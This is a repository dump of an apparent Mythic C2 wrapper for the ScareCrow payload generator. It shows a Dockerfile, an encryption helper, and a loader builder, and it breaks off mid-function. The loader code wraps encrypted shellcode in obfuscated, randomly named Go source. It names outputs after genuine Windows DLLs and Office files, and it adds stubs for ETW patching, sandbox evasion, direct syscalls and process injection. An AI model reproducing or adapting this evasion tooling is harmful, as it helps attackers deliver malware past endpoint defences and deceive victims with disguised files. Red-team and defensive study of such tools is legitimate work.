├── .gitignore ├── C2_Profiles └── .keep ├── Payload_Type ├── .keep └── scarecrow_wrapper │ ├── Dockerfile │ ├── agent_code │ ├── README.md │ └── ScareCrow │ │ ├── .DS_Store │ │ ├── Cryptor │ │ └── Cryptor.go │ │ ├── LICENSE │ │ ├── Loader │ │ └── Loader.go │ │ ├── README.md │ │ ├── ScareCrow │ │ ├── ScareCrow.go │ │ ├── Screenshots │ │ ├── File_Attributes.png │ │ ├── PreRefreshed_Dlls.png │ │ ├── Refreshed_Dlls.png │ │ └── ScareCrow.png │ │ ├── Struct │ │ └── Struct.go │ │ ├── Utils │ │ └── Utils.go │ │ ├── go.mod │ │ ├── go.sum │ │ ├── limelighter │ │ └── limelighter.go │ │ └── main.json │ └── mythic │ ├── agent_functions │ ├── __init__.py │ └── builder.py │ ├── mythic_service.py │ ├── payload_service.sh │ └── rabbitmq_config.json ├── README.md ├── agent_icons └── .keep ├── config.json ├── documentation-c2 └── .keep ├── documentation-payload └── .keep └── documentation-wrapper └── .keep /.gitignore: -------------------------------------------------------------------------------- 1 | __pycache__/ 2 | *.py[cod] 3 | # Sphinx documentation 4 | docs/_build/ 5 | # Environments 6 | .env 7 | .venv 8 | env/ 9 | venv/ 10 | ENV/ 11 | env.bak/ 12 | venv.bak/ 13 | # pycharm 14 | .idea/ 15 | # ssl certs 16 | ssl/ 17 | # Mythic files 18 | files/ 19 | mythic_access.* 20 | postgres-docker/database/ 21 | rabbitmq-docker/storage/ 22 | display_output.txt 23 | ## Ignore Visual Studio temporary files, build results, and 24 | ## files generated by popular Visual Studio add-ons. 
25 | ## 26 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 27 | 28 | # User-specific files 29 | *.suo 30 | *.user 31 | *.userosscache 32 | *.sln.docstates 33 | 34 | # User-specific files (MonoDevelop/Xamarin Studio) 35 | *.userprefs 36 | 37 | # Build results 38 | [Dd]ebug/ 39 | [Dd]ebugPublic/ 40 | [Rr]elease/ 41 | [Rr]eleases/ 42 | x64/ 43 | x86/ 44 | bld/ 45 | [Bb]in/ 46 | [Oo]bj/ 47 | [Ll]og/ 48 | 49 | # Visual Studio 2015/2017 cache/options directory 50 | .vs/ 51 | # Uncomment if you have tasks that create the project's static files in wwwroot 52 | #wwwroot/ 53 | 54 | # Visual Studio 2017 auto generated files 55 | Generated\ Files/ 56 | 57 | # MSTest test Results 58 | [Tt]est[Rr]esult*/ 59 | [Bb]uild[Ll]og.* 60 | 61 | # NUNIT 62 | *.VisualState.xml 63 | TestResult.xml 64 | 65 | # Build Results of an ATL Project 66 | [Dd]ebugPS/ 67 | [Rr]eleasePS/ 68 | dlldata.c 69 | 70 | # Benchmark Results 71 | BenchmarkDotNet.Artifacts/ 72 | 73 | # .NET Core 74 | project.lock.json 75 | project.fragment.lock.json 76 | artifacts/ 77 | **/Properties/launchSettings.json 78 | 79 | # StyleCop 80 | StyleCopReport.xml 81 | 82 | # Files built by Visual Studio 83 | *_i.c 84 | *_p.c 85 | *_i.h 86 | *.ilk 87 | *.meta 88 | *.obj 89 | *.iobj 90 | *.pch 91 | *.pdb 92 | *.ipdb 93 | *.pgc 94 | *.pgd 95 | *.rsp 96 | *.sbr 97 | *.tlb 98 | *.tli 99 | *.tlh 100 | *.tmp 101 | *.tmp_proj 102 | *.log 103 | *.vspscc 104 | *.vssscc 105 | .builds 106 | *.pidb 107 | *.svclog 108 | *.scc 109 | 110 | # Chutzpah Test files 111 | _Chutzpah* 112 | 113 | # Visual C++ cache files 114 | ipch/ 115 | *.aps 116 | *.ncb 117 | *.opendb 118 | *.opensdf 119 | *.sdf 120 | *.cachefile 121 | *.VC.db 122 | *.VC.VC.opendb 123 | 124 | # Visual Studio profiler 125 | *.psess 126 | *.vsp 127 | *.vspx 128 | *.sap 129 | 130 | # Visual Studio Trace Files 131 | *.e2e 132 | 133 | # TFS 2012 Local Workspace 134 | $tf/ 135 | 136 | # Guidance Automation Toolkit 137 | *.gpState 138 | 139 | # 
ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user

# vscode
.vscode/
--------------------------------------------------------------------------------
/C2_Profiles/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/C2_Profiles/.keep
--------------------------------------------------------------------------------
/Payload_Type/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/.keep
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/Dockerfile:
--------------------------------------------------------------------------------
# Build image for the Mythic payload-type container: the Mythic Python base
# plus osslsigncode, openssl, mingw-w64 (a Windows cross-toolchain) and a Go
# toolchain installed by hand below.
FROM itsafeaturemythic/python38_payload:0.0.7
# NOTE(review): the base image is pinned by tag only; pinning by digest
# (FROM image@sha256:<digest>) makes the build reproducible and tamper-evident.
RUN apt-get update && apt-get install -y osslsigncode openssl mingw-w64 wget --no-install-recommends
WORKDIR /tmp
# NOTE(review): the Go tarball is fetched over HTTPS but its checksum is never
# verified, so a substituted or corrupted archive would be installed silently.
# Compare it against the published SHA-256 (e.g. `sha256sum -c`) before the
# tar step. Go 1.14 is also well past its security-support window; confirm the
# wrapper still needs that exact release.
RUN wget https://storage.googleapis.com/golang/go1.14.linux-amd64.tar.gz
RUN tar -C /usr/local -xzf go1.14.linux-amd64.tar.gz
# The downloaded archive and the apt lists remain in the image layers; a
# cleanup step after extraction would shrink the image.
RUN ln -s /usr/local/go/bin/go /usr/bin/go
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/README.md:
--------------------------------------------------------------------------------
ScareCrow version 2.3
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/.DS_Store
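--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Cryptor/Cryptor.go:
--------------------------------------------------------------------------------
package Cryptor

import (
	"bytes"
	"crypto/rand"
	"encoding/hex"
	"errors"
	"fmt"
	"log"
	crand "math/rand"
	"time"
)

// letters is the alphabet generated identifier names are drawn from
// (ASCII letters only, so every result is a valid Go identifier).
const letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

var (
	// ErrInvalidBlockSize is returned by Pkcs7Pad for a block size that is
	// not positive or that a single padding byte cannot express.
	ErrInvalidBlockSize = errors.New("[-] Invalid Blocksize")

	// ErrInvalidPKCS7Data is returned by Pkcs7Pad for empty input.
	ErrInvalidPKCS7Data = errors.New("[-] Invalid PKCS7 Data (Empty or Not Padded)")

	// ErrInvalidPKCS7Padding is exported for callers that unpad; nothing in
	// this file returns it.
	ErrInvalidPKCS7Padding = errors.New("[-] Invalid Padding on Input")
)

// init seeds math/rand once per process. The original code reseeded from the
// wall clock inside every call, so two calls landing in the same clock tick
// produced identical "random" values.
func init() {
	crand.Seed(time.Now().UnixNano())
}

// Pkcs7Pad appends PKCS#7 padding to b so that its length becomes a multiple
// of blocksize. When len(b) is already a multiple, a whole extra block of
// padding is appended, as the scheme requires.
//
// Returns ErrInvalidBlockSize when blocksize is outside 1..255 and
// ErrInvalidPKCS7Data when b is empty or nil. b itself is never modified.
func Pkcs7Pad(b []byte, blocksize int) ([]byte, error) {
	// The pad length is stored in one byte, so block sizes above 255 cannot
	// be represented; the original silently truncated byte(n) for them.
	if blocksize <= 0 || blocksize > 255 {
		return nil, ErrInvalidBlockSize
	}
	if len(b) == 0 { // also covers a nil slice
		return nil, ErrInvalidPKCS7Data
	}
	n := blocksize - (len(b) % blocksize)
	padded := make([]byte, len(b)+n)
	copy(padded, b)
	copy(padded[len(b):], bytes.Repeat([]byte{byte(n)}, n))
	return padded, nil
}

// RandomBuffer returns size bytes read from crypto/rand. This is the only
// cryptographically secure source in this package and the one to use for key
// and IV material; the process exits if the OS random source fails.
func RandomBuffer(size int) []byte {
	buffer := make([]byte, size)
	if _, err := rand.Read(buffer); err != nil {
		log.Fatal(err)
	}
	return buffer
}

// RandStringBytes returns n letters chosen with math/rand. It is NOT
// cryptographically secure and is only suitable for cosmetic values such as
// generated identifier names, never for secrets.
func RandStringBytes(n int) string {
	b := make([]byte, n)
	for i := range b {
		b[i] = letters[crand.Intn(len(letters))]
	}
	return string(b)
}

// VarNumberLength returns a random identifier whose length is drawn from
// [min, max). See GenerateNumer for how a degenerate range is handled.
func VarNumberLength(min, max int) string {
	return RandStringBytes(GenerateNumer(min, max))
}

// printHexOutput prints each input as a lowercase hex string on its own line.
// Debug helper; nothing in this file calls it.
func printHexOutput(input ...[]byte) {
	for _, i := range input {
		fmt.Println(hex.EncodeToString(i))
	}
}

// GenerateNumer returns a pseudo-random int in [min, max). The misspelling is
// part of the exported API and is kept for callers. A range with max <= min
// now yields min instead of panicking inside rand.Intn.
func GenerateNumer(min, max int) int {
	if max <= min {
		return min
	}
	return crand.Intn(max-min) + min
}
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2021 Optiv Security

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.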
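--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Loader/Loader.go:
--------------------------------------------------------------------------------
package Loader

import (
	"ScareCrow/Cryptor"
	"ScareCrow/Struct"
	"ScareCrow/Utils"
	"bufio"
	"bytes"
	"encoding/base64"
	"encoding/hex"
	"fmt"
	"io/ioutil"
	"log"
	"os"
	"strings"
	"text/template"
)

// The types below are template contexts: each carries only a Variables map
// whose entries the text/template sources in package Struct look up by key.
type Binary struct {
	Variables map[string]string
}

type JScript struct {
	Variables map[string]string
}

type JScriptLoader struct {
	Variables map[string]string
}

type SandboxJScript struct {
	Variables map[string]string
}

type ETW struct {
	Variables map[string]string
}

type DLL struct {
	Variables map[string]string
}
type WindowsVersion struct {
	Variables map[string]string
}
type Sandboxfunction struct {
	Variables map[string]string
}
type Sandbox_DomainJoined struct {
	Variables map[string]string
}
type HTALoader struct {
	Variables map[string]string
}
type Macro struct {
	Variables map[string]string
}

var (
	// buffer is package-level scratch space shared by the generators in this
	// file; anything that writes into it must Reset() it first.
	buffer bytes.Buffer
)

// FileName picks a display name for the output artifact from a fixed per-mode
// list and returns (name, name+extension). Unknown modes return ("", "").
//
// The index bound is derived from each list's length. The original used
// hard-coded bounds that had drifted from the lists: "wscript" drew indices
// 0..9 from a 9-entry slice (index out of range panic about one time in ten)
// and "dll"/"msiexec" drew 0..8 from a 10-entry slice (last entry unreachable).
func FileName(mode string) (string, string) {
	wscript := []string{"APMon", "bisrv", "btpanui", "certcli", "cmdext", "httpapi", "libcrypto", "netlogon", "tcpmon"}
	dllname := []string{"apphelp", "bcryptprimitives", "cfgmgr32", "combase", "cryptsp", "dpapi", "sechost", "schannel", "urlmon", "win32u"}
	cplname := []string{"appwizard", "bthprop", "desktop", "netfirewall", "FlashPlayer", "hardwarewiz", "inetcontrol", "control", "irprop", "game", "inputs", "mimosys", "ncp", "power", "speech", "system", "Tablet", "telephone", "datetime", "winsec"}
	officename := []string{"Timesheet", "Reports", "Zoom", "Updates", "Calculator", "Calendar", "Memo", "Desk", "Appwiz"}
	Binaryname := []string{"Excel", "Word", "Outlook", "Powerpnt", "lync", "cmd", "OneDrive", "OneNote"}

	// pick returns one entry chosen uniformly; GenerateNumer's range is
	// half-open, so len(names) is the correct upper bound.
	pick := func(names []string) string {
		return names[Cryptor.GenerateNumer(0, len(names))]
	}

	var name, ext string
	switch mode {
	case "excel":
		name, ext = pick(officename), ".xll"
	case "control":
		name, ext = pick(cplname), ".cpl"
	case "wscript":
		name, ext = pick(wscript), ".dll"
	case "dll", "msiexec":
		name, ext = pick(dllname), ".dll"
	case "binary":
		name, ext = pick(Binaryname), ".exe"
	default:
		return "", ""
	}
	return name, name + ext
}

// ETW_Buff renders Struct.ETW_Function() with freshly generated identifier
// names and returns the rendered source together with the name generated for
// the "ETW" key (DLLfile appends "()" to that name).
func ETW_Buff() (string, string) {
	var buffer bytes.Buffer
	ETW := &ETW{}
	ETW.Variables = make(map[string]string)
	ETW.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["procEtwNotificationRegister"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["procEtwEventRegister"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["procEtwEventWriteFull"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["errnoErr"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["WriteProcessMemory"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["hProcess"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["lpBaseAddress"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["lpBuffer"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["nSize"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["lpNumberOfBytesWritten"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["ETW"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["handle"] = Cryptor.VarNumberLength(4, 9)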
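// (ETW_Buff continued: remaining identifier names, then the template render.)
	ETW.Variables["dataAddr"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["i"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["data"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["nLength"] = Cryptor.VarNumberLength(4, 9)
	ETW.Variables["datalength"] = Cryptor.VarNumberLength(4, 9)

	buffer.Reset()
	ETWTemplate, err := template.New("ETW").Parse(Struct.ETW_Function())
	if err != nil {
		log.Fatal(err)
	}
	buffer.Reset()
	if err := ETWTemplate.Execute(&buffer, ETW); err != nil {
		log.Fatal(err)
	}
	return buffer.String(), ETW.Variables["ETW"]
}

// fillRandomIdentifiers assigns a fresh random identifier (4 to 11 letters,
// see Cryptor.VarNumberLength) to every key in names. Keys that the original
// assigned more than once were simply overwritten by the last draw, so each
// key needs to appear only once here.
func fillRandomIdentifiers(vars map[string]string, names ...string) {
	for _, k := range names {
		vars[k] = Cryptor.VarNumberLength(4, 12)
	}
}

// renderTemplate parses src as a text/template named name and executes it
// against data into a private buffer. Either failure terminates the process
// via log.Fatal, exactly as the inline code it replaces did.
func renderTemplate(name, src string, data interface{}) string {
	tmpl, err := template.New(name).Parse(src)
	if err != nil {
		log.Fatal(err)
	}
	var out bytes.Buffer
	if err := tmpl.Execute(&out, data); err != nil {
		log.Fatal(err)
	}
	return out.String()
}

// DLLfile renders the Go source of the DLL-style output for mode from the
// templates in package Struct and returns it as a string.
//
//   b64ciphertext    – base64 payload; passed through Utils.B64ripper under a
//                      randomly named variable
//   b64key, b64iv    – copied verbatim into the "key" and "iv" variables
//   mode             – "excel", "control", "wscript", "dll" or "msiexec";
//                      selects the export stub stored as "ExportName" (other
//                      values leave it unset, as before)
//   refresher        – selects between the DLL / DLL_Refresher template pairs
//   name             – accepted for interface compatibility; not used here
//   sandbox          – when set, the Sandbox templates are rendered as well
//   ETW              – when set, ETW_Buff output is rendered as well
//   ProcessInjection – when non-empty and refresher is false, switches to the
//                      process-injection template; backslashes are doubled
//
// Any template parse/execute failure terminates the process via log.Fatal.
//
// This version no longer writes into the package-level buffer: the original
// executed its first template into that shared buffer without a Reset(), so
// a second call in the same process would have been prefixed with the whole
// output of the first. Like ETW_Buff and Binaryfile it now uses private
// buffers.
func DLLfile(b64ciphertext string, b64key string, b64iv string, mode string, refresher bool, name string, sandbox bool, ETW bool, ProcessInjection string) string {
	DLL := &DLL{Variables: make(map[string]string)}
	vars := DLL.Variables

	// Values carried in from the caller.
	vars["fullciphertext"] = Cryptor.VarNumberLength(4, 12)
	vars["ciphertext"] = Utils.B64ripper(b64ciphertext, vars["fullciphertext"], true)
	vars["key"] = b64key
	vars["iv"] = b64iv

	// Every other entry is a generated identifier substituted for a local
	// name inside the templates; which keys a given template actually reads
	// is decided in package Struct, so the full set is always populated.
	fillRandomIdentifiers(vars,
		"vkey", "viv", "block", "decrypted", "mode", "vciphertext", "rawdata", "stuff",
		"raw_bin", "hexdata", "PKCS5UnPadding", "length", "src", "unpadding",
		"ptr", "buff", "virtualAlloc", "alloc", "phandle", "baseA", "zerob", "alloctype", "protect",
		"regionsizep", "regionsize", "WQRH", "xx", "yy", "Versionfunc", "k", "Version", "MV", "MinV",
		"customsyscall", "customsyscallVP", "syscallnumber",
		"loc", "dll", "error", "x", "file", "loaddll", "handle", "dllBase", "dllOffset", "old", "mem",
		"oldptrperms", "shellcode", "oldshellcodeperms", "loader", "VirtualProtect", "procVirtualProtect",
		"Reloading", "bytes", "getWin", "showWin", "hwnd",
		"oldfartcodeperms", "runfunc", "NewProtect", "oldprotect", "baseAddress", "regionSize", "processHandle",
		"handlez", "syscall", "NtProtectVirtualMemory", "sysid", "bytesdata", "locdata", "xdata",
		"dllBasedata", "dllOffsetdata", "memdata",
		"CreateProcess", "GetModuleInformation", "ReloadRemoteProcess", "RemoteModuleReloading", "Target",
		"WriteProcessMemory", "addr", "buf", "commandLine", "data", "err",
		"funcNtAllocateVirtualMemory", "funcNtCreateThreadEx", "funcNtProtectVirtualMemory", "funcNtWriteVirtualMemory",
		"hModule", "hProcess", "handleSize", "hh", "lpBaseAddress", "lpBuffer", "lpNumberOfBytesWritten",
		"mi", "MI", "mod", "modules", "module", "nLength", "nSize", "name", "needed", "n", "offsetaddr",
		"oldProtect", "outString", "pi", "procEnumProcessModules", "EnumProcessModules",
		"procGetModuleBaseName", "GetModuleBaseName", "procGetModuleInformation", "procWriteProcessMemory",
		"process", "rawbytes", "s", "si", "size", "startupInfo",
		"PROCESS_ALL_ACCESS", "errnoERROR_IO_PENDING", "errERROR_IO_PENDING",
	)

	if sandbox {
		fillRandomIdentifiers(vars, "IsDomainJoined", "domain", "status")
		vars["Sandboxfunction"] = renderTemplate("Sandboxfunction", Struct.Sandbox(), DLL)
		// "checker" is generated between the two renders on purpose: the
		// original only made it available to the second template.
		vars["checker"] = Cryptor.VarNumberLength(4, 12)
		vars["Sandbox"] = renderTemplate("Sandbox_DomainJoined", Struct.Sandbox_DomainJoined(), DLL)
		// NOTE(review): "SandboxImport" is only defined on the else branch.
		// If Struct.DLL()/DLL_Refresher() reference it, the sandbox build
		// renders "<no value>" there — confirm against those templates.
	} else {
		vars["Sandbox"] = ""
		vars["Sandboxfunction"] = ""
		vars["SandboxImport"] = ""
	}

	// The syscall-number template only sees these four names.
	WindowsVersion := &WindowsVersion{Variables: map[string]string{
		"Version":         vars["Version"],
		"syscall":         vars["syscall"],
		"customsyscall":   vars["customsyscall"],
		"customsyscallVP": vars["customsyscallVP"],
	}}

	if ETW {
		etwFunction, etwName := ETW_Buff()
		vars["ETW"] = etwName + "()"
		vars["ETW_Function"] = etwFunction
	} else {
		vars["ETW"] = ""
		vars["ETW_Function"] = ""
	}

	// Template selection, kept exactly as before. NOTE(review): the mapping
	// looks inverted relative to the flag name (refresher == false selects the
	// *_Refresher templates); preserved because package Struct and the callers
	// agree on it, but worth confirming.
	var loaderTemplate, dllStructTemplate string
	if !refresher {
		loaderTemplate = Struct.WindowsVersion_DLL_Refresher()
		dllStructTemplate = Struct.DLL_Refresher()
	} else {
		loaderTemplate = Struct.WindowsVersion_DLL()
		dllStructTemplate = Struct.DLL()
	}
	if ProcessInjection != "" && !refresher {
		// Backslashes are doubled, presumably because the path is interpolated
		// into a quoted string literal by the template.
		vars["processpath"] = strings.Replace(ProcessInjection, "\\", "\\\\", -1)
		loaderTemplate = Struct.WindowsVersion_DLL_Refresher()
		dllStructTemplate = Struct.Procces_Injection_DLL()
	}

	vars["SyscallNumberlist"] = renderTemplate("WindowsVersion", loaderTemplate, WindowsVersion)

	switch mode {
	case "excel":
		vars["ExportName"] = Struct.JS_Office_Export()
	case "control":
		vars["ExportName"] = Struct.JS_Control_Export()
	case "wscript", "dll", "msiexec":
		vars["ExportName"] = Struct.WS_JS_Export()
	}

	return renderTemplate("DLL", dllStructTemplate, DLL)
}

func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string, console bool, sandbox bool, name string, ETW bool, ProcessInjection string) string {
	var Structure string
	var buffer bytes.Buffer
	Binary := &Binary{}
	Sandboxfunction := &Sandboxfunction{}
	Sandboxfunction.Variables = make(map[string]string)
	Sandbox_DomainJoined := &Sandbox_DomainJoined{}
	Sandbox_DomainJoined.Variables = make(map[string]string)
	Binary.Variables = make(map[string]string)
	WindowsVersion := &WindowsVersion{}
	WindowsVersion.Variables = make(map[string]string)
	Binary.Variables["fullciphertext"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["ciphertext"] = Utils.B64ripper(b64ciphertext, Binary.Variables["fullciphertext"], true)
	Binary.Variables["key"] = b64key
	Binary.Variables["iv"] = b64iv
	Binary.Variables["vkey"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["viv"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["block"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["decrypted"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["mode"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["vciphertext"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["rawdata"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["stuff"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["raw_bin"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["hexdata"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["PKCS5UnPadding"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["length"] = Cryptor.VarNumberLength(4, 12)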
Binary.Variables["src"] = Cryptor.VarNumberLength(4, 12) 425 | Binary.Variables["unpadding"] = Cryptor.VarNumberLength(4, 12) 426 | 427 | Binary.Variables["loc"] = Cryptor.VarNumberLength(4, 12) 428 | Binary.Variables["dll"] = Cryptor.VarNumberLength(4, 12) 429 | Binary.Variables["error"] = Cryptor.VarNumberLength(4, 12) 430 | Binary.Variables["x"] = Cryptor.VarNumberLength(4, 12) 431 | Binary.Variables["file"] = Cryptor.VarNumberLength(4, 12) 432 | Binary.Variables["loaddll"] = Cryptor.VarNumberLength(4, 12) 433 | Binary.Variables["handle"] = Cryptor.VarNumberLength(4, 12) 434 | Binary.Variables["dllBase"] = Cryptor.VarNumberLength(4, 12) 435 | Binary.Variables["dllOffset"] = Cryptor.VarNumberLength(4, 12) 436 | Binary.Variables["old"] = Cryptor.VarNumberLength(4, 12) 437 | Binary.Variables["mem"] = Cryptor.VarNumberLength(4, 12) 438 | Binary.Variables["oldptrperms"] = Cryptor.VarNumberLength(4, 12) 439 | Binary.Variables["ptr"] = Cryptor.VarNumberLength(4, 12) 440 | Binary.Variables["shellcode"] = Cryptor.VarNumberLength(4, 12) 441 | Binary.Variables["oldshellcodeperms"] = Cryptor.VarNumberLength(4, 12) 442 | Binary.Variables["loader"] = Cryptor.VarNumberLength(4, 12) 443 | Binary.Variables["hexdata"] = Cryptor.VarNumberLength(4, 12) 444 | Binary.Variables["VirtualProtect"] = Cryptor.VarNumberLength(4, 12) 445 | Binary.Variables["procVirtualProtect"] = Cryptor.VarNumberLength(4, 12) 446 | Binary.Variables["Reloading"] = Cryptor.VarNumberLength(4, 12) 447 | Binary.Variables["bytes"] = Cryptor.VarNumberLength(4, 12) 448 | Binary.Variables["Console"] = Cryptor.VarNumberLength(4, 12) 449 | Binary.Variables["getWin"] = Cryptor.VarNumberLength(4, 12) 450 | Binary.Variables["showWin"] = Cryptor.VarNumberLength(4, 12) 451 | Binary.Variables["hwnd"] = Cryptor.VarNumberLength(4, 12) 452 | Binary.Variables["show"] = Cryptor.VarNumberLength(4, 12) 453 | Binary.Variables["SW_RESTORE"] = Cryptor.VarNumberLength(4, 12) 454 | Binary.Variables["SW_HIDE"] = 
Cryptor.VarNumberLength(4, 12) 455 | Binary.Variables["Version"] = Cryptor.VarNumberLength(4, 12) 456 | Binary.Variables["syscall"] = Cryptor.VarNumberLength(4, 12) 457 | Binary.Variables["Versionfunc"] = Cryptor.VarNumberLength(4, 12) 458 | Binary.Variables["k"] = Cryptor.VarNumberLength(4, 12) 459 | Binary.Variables["Version"] = Cryptor.VarNumberLength(4, 12) 460 | Binary.Variables["MV"] = Cryptor.VarNumberLength(4, 12) 461 | Binary.Variables["MinV"] = Cryptor.VarNumberLength(4, 12) 462 | Binary.Variables["syscallnumber"] = Cryptor.VarNumberLength(4, 12) 463 | Binary.Variables["NtProtectVirtualMemory"] = Cryptor.VarNumberLength(4, 12) 464 | Binary.Variables["bytesdata"] = Cryptor.VarNumberLength(4, 12) 465 | Binary.Variables["locdata"] = Cryptor.VarNumberLength(4, 12) 466 | Binary.Variables["xdata"] = Cryptor.VarNumberLength(4, 12) 467 | Binary.Variables["dllBasedata"] = Cryptor.VarNumberLength(4, 12) 468 | Binary.Variables["dllOffsetdata"] = Cryptor.VarNumberLength(4, 12) 469 | Binary.Variables["memdata"] = Cryptor.VarNumberLength(4, 12) 470 | Binary.Variables["customsyscall"] = Cryptor.VarNumberLength(4, 12) 471 | 472 | Binary.Variables["PROCESS_ALL_ACCESS"] = Cryptor.VarNumberLength(4, 12) 473 | Binary.Variables["errnoERROR_IO_PENDING"] = Cryptor.VarNumberLength(4, 12) 474 | Binary.Variables["errERROR_IO_PENDING"] = Cryptor.VarNumberLength(4, 12) 475 | 476 | Binary.Variables["handle"] = Cryptor.VarNumberLength(4, 12) 477 | Binary.Variables["regionsize"] = Cryptor.VarNumberLength(4, 12) 478 | Binary.Variables["runfunc"] = Cryptor.VarNumberLength(4, 12) 479 | Binary.Variables["oldptrperms"] = Cryptor.VarNumberLength(4, 12) 480 | Binary.Variables["oldfartcodeperms"] = Cryptor.VarNumberLength(4, 12) 481 | Binary.Variables["processHandle"] = Cryptor.VarNumberLength(4, 12) 482 | Binary.Variables["NewProtect"] = Cryptor.VarNumberLength(4, 12) 483 | Binary.Variables["sysid"] = Cryptor.VarNumberLength(4, 12) 484 | 485 | Binary.Variables["oldptrperms"] = 
Cryptor.VarNumberLength(4, 12) 486 | Binary.Variables["baseAddress"] = Cryptor.VarNumberLength(4, 12) 487 | Binary.Variables["regionSize"] = Cryptor.VarNumberLength(4, 12) 488 | Binary.Variables["oldprotect"] = Cryptor.VarNumberLength(4, 12) 489 | Binary.Variables["handlez"] = Cryptor.VarNumberLength(4, 12) 490 | 491 | Binary.Variables["CreateProcess"] = Cryptor.VarNumberLength(4, 12) 492 | Binary.Variables["GetModuleInformation"] = Cryptor.VarNumberLength(4, 12) 493 | Binary.Variables["ReloadRemoteProcess"] = Cryptor.VarNumberLength(4, 12) 494 | Binary.Variables["RemoteModuleReloading"] = Cryptor.VarNumberLength(4, 12) 495 | Binary.Variables["Target"] = Cryptor.VarNumberLength(4, 12) 496 | Binary.Variables["WriteProcessMemory"] = Cryptor.VarNumberLength(4, 12) 497 | Binary.Variables["addr"] = Cryptor.VarNumberLength(4, 12) 498 | Binary.Variables["buf"] = Cryptor.VarNumberLength(4, 12) 499 | Binary.Variables["bytes"] = Cryptor.VarNumberLength(4, 12) 500 | Binary.Variables["commandLine"] = Cryptor.VarNumberLength(4, 12) 501 | Binary.Variables["data"] = Cryptor.VarNumberLength(4, 12) 502 | Binary.Variables["dll"] = Cryptor.VarNumberLength(4, 12) 503 | Binary.Variables["dllBase"] = Cryptor.VarNumberLength(4, 12) 504 | Binary.Variables["dllOffset"] = Cryptor.VarNumberLength(4, 12) 505 | Binary.Variables["err"] = Cryptor.VarNumberLength(4, 12) 506 | Binary.Variables["file"] = Cryptor.VarNumberLength(4, 12) 507 | Binary.Variables["funcNtAllocateVirtualMemory"] = Cryptor.VarNumberLength(4, 12) 508 | Binary.Variables["funcNtCreateThreadEx"] = Cryptor.VarNumberLength(4, 12) 509 | Binary.Variables["funcNtProtectVirtualMemory"] = Cryptor.VarNumberLength(4, 12) 510 | Binary.Variables["funcNtWriteVirtualMemory"] = Cryptor.VarNumberLength(4, 12) 511 | Binary.Variables["hModule"] = Cryptor.VarNumberLength(4, 12) 512 | Binary.Variables["hProcess"] = Cryptor.VarNumberLength(4, 12) 513 | Binary.Variables["handle"] = Cryptor.VarNumberLength(4, 12) 514 | Binary.Variables["handleSize"] 
